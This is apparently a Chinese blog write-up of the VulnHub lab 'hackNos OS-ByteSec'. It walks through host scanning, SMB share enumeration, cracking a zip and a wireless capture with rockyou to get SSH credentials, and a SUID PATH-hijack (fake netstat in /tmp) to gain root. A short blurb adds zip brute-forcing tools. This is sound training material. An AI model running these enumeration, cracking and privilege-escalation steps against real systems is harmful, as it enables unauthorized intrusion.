bytesec靶场

靶场下载


https://www.vulnhub.com/entry/hacknos-os-bytesec,393/

下载完成后进入配置修改网卡

教程

配置

第一步:启动靶机时按下 shift 键,

  • 进入以下界面

image-20230811104648298

第二步:选择第二个选项,然后按下 e 键,进入编辑界面

image-20230811104707659

将这里的ro修改为rw single init=/bin/bash,然后按ctrl+x,进入一个相当于控制台的界面,里面可以执行命令

image-20230811104721458

ip a 查看一下实际用的网卡,这里是ens33

image-20230811104737405

vim /etc/network/interfaces 看一下配置信息用的是哪一个网卡,如果不一致,则将这两个都改成 ens33

  • 按下 i 即可进入编辑模式

image-20230811104752952

/etc/init.d/networking restart 重启网卡服务

一、发现主机

工具nmap及netdiscover

nmap -sP 192.168.16.0/24

or

netdiscover -i eth0 -r 192.168.16.0/24

image-20230815105541557

登录验证:

image-20230815105557214

获取详细信息

nmap -sV -sC -A  192.168.16.175  

可知版本号,常见开放端口等

image-20230815105756849

二、扫描目录

工具gobuster

gobuster  dir -u http://192.168.16.175    -w /usr/share/wordlists/dirbuster/directory-list-2.3-sma

image-20230815110115521

工具 dirsearch

dirsearch -u http://192.168.16.175/

image-20230815112039284

访问扫描到的目录,发现基本都是图片,没有什么可以利用的信息

三、 smb服务漏洞

刚刚扫描中有发现smb服务,

445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)

文件共享服务(SMB)解释:

通过网络提供文件共享服务,提供文件下载和上传服务(类似于FTP服务器)

工具 smbmap

SMBMap允许用户枚举整个域中的samba共享驱动器。用户可以使用该工具列出共享驱动器、驱动器权限、共享内容、上传/下载功能、文件名自动下载模式匹配,甚至远程执行命令。该工具原本的设计初衷是为了简化在大型网络中搜索潜在敏感数据的过程。

smbmap -H 192.168.16.175 

这里显示没有权限:NO ACCESS

image-20230815114116772

工具enum4linux

Enum4linux是用于枚举windows和Linux系统上的SMB服务的工具。可以轻松的从与SMB服务有关的目标中快速提取信息。

enum4linux 192.168.16.175

image-20230815114618934

显示用户名保存下

image-20230815114754857

尝试登录

smbmap -H 192.168.16.175 -u 用户名

使用 smb用户发现是可读的,应该是没有密码

image-20230815115202983

工具smbclinet

smbclient是客户端软件,是测试与Windows共享连接的有用工具。它可用于传输文件或查看共享名。

直接连接:

smbclient//192.168.16.175 -U smb 

报错:

image-20230815115911251

这里猜测是隐藏文件

访问

smbclient //192.168.16.175/smb  -U smb

成功连接并可以执行命令

image-20230815120024739

发现一个main.txt文件和一个safe.zip压缩文件,直接查看失败

下载到本地进行查看

get main.txt

get safe.zip

image-20230815140741410

main.txt中没有东西,safe.zip中有密码

解密 工具:fcrackzip 破解压缩文件

Fcrackzip是一款专门破解zip类型压缩文件密码的工具,工具小巧方便、破解速度快,能使用字典和指定字符集破解,适用于linux、mac osx 系统。

部分重要参数说明

-b 表示使用暴利破解的方式
-c 'aA1' 表示使用大小写字母和数字混合破解的方式
-l 1-10 表示需要破解的密码长度为1到10位
-u 表示只显示破解出来的密码,其他错误的密码不显示出
-D 表示要使用字典破解
-p 表示要使用那个字典破解

注:Kali linux自带了一些字典在/usr/share/wordlists/文件夹下。

这里使用的字典为rockyou.txt需要在kali中解压后使用

gzip -d /usr/share/wordlists/rockyou.txt.gz

语法:

fcrackzip  -D -p /usr/share/wordlists/rockyou.txt  -u  safe.zip 

image-20230815142203970

解压后,里面一个图片和一个cap文件,使用wireshark打开,但是没有发现什么可用信息。

图片查看:exiftool secret.jpg

image-20230815143314957

image-20230815143054164

工具aircrack-ng 猜测数据包

Aircrack-ng是一款用于无线网络渗透测试的工具,它可以扫描无线网络、捕获数据包、破解密码等。

流量包中可能存在密码使用工具猜解密码

aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

密码可能是 snowflake,账号在刚刚得到的三个中进行尝试

image-20230815150404561

ssh远程登陆

ssh     blackjax@192.168.16.175 -p 2525

输入密码:snowflake登录成功,更改为bash模式

image-20230815150903356

查看当前存在的用户

cat /etc/passwd

image-20230815151057759

返回得到第一个flag

image-20230815151203482

四、劫持命令提权

1.查找出具有suid权限的文件

SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了

已知的可用来提权的linux可行性的文件列表如下:
nmap
vim
find
bash
more
less
nano
cp

查找语句

find / -perm -u=s -type f 2>/dev/null

image-20230815155246089

发现netscan命令

2.分析netscan文件

查看

netstat -anpt

netscan
两条命令,执行结果基本一致

image-20230815160950543

xxd命令可以为给定的标准输入或者文件做一次十六进制的输出

这里使用xxd是因为文件是C编译的

xxd /usr/bin/netscan | less

可以看到该文件这边是调用了netstat -anpt命令

image-20230815161320887

确认该文件为root权限

image-20230815161518194

3.添加劫持

cd /tmp/
这里要先切换到临时目录
echo "/bin/sh" >netstat

#在临时目录创建一个文件调用netstat这个命令 
chmod 777 netstat
export PATH=/tmp:$PATH   

#意思是可执行文件的路径包括原先设定的路径,也包括从“路径1”到“路径n”的所有路径。

image-20230815162912379

最后执行netscan,提权成功

image-20230815162855293

查看获取flag

# cd /home/blackjax
# ls
user.txt
# cat user.txt

image-20230815163042895

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
要在Windows上进行压缩包的爆破,您可以使用工具rarcrack。rarcrack可以指定要爆破的文件类型,如rar、zip、7z,并可以定义最大长度等参数。它最大支持12线程来加速爆破过程。使用命令rarcrack [压缩包路径 -threads 12 -type [压缩包类型可以进行爆破操作。然而,需要注意的是,爆破过程可能需要一定的时间,并且并不保证一定能成功破解密码。有时候可能会出现没有结果或速度较慢的情况。另外,如果您需要爆破zip压缩包,您还可以使用工具fcrackzip。使用命令fcrackzip [压缩包路径可以进行zip压缩包的爆破。 [2] 引用 > [保存密码哈希的文件可以提取密码哈希。然后使用John the Ripper等工具进行破解。 [3<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [如何才能简洁高效不失优雅的爆破ZIP文件?](https://blog.csdn.net/zxsctf/article/details/131356650)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [【甄选靶场】Vulnhub百个项目渗透——项目四十八:HACKNOS:OS-BYTESEC(压缩包爆破,无线爆破,环境变量...](https://blog.csdn.net/weixin_65527369/article/details/127443994)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿凯6666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值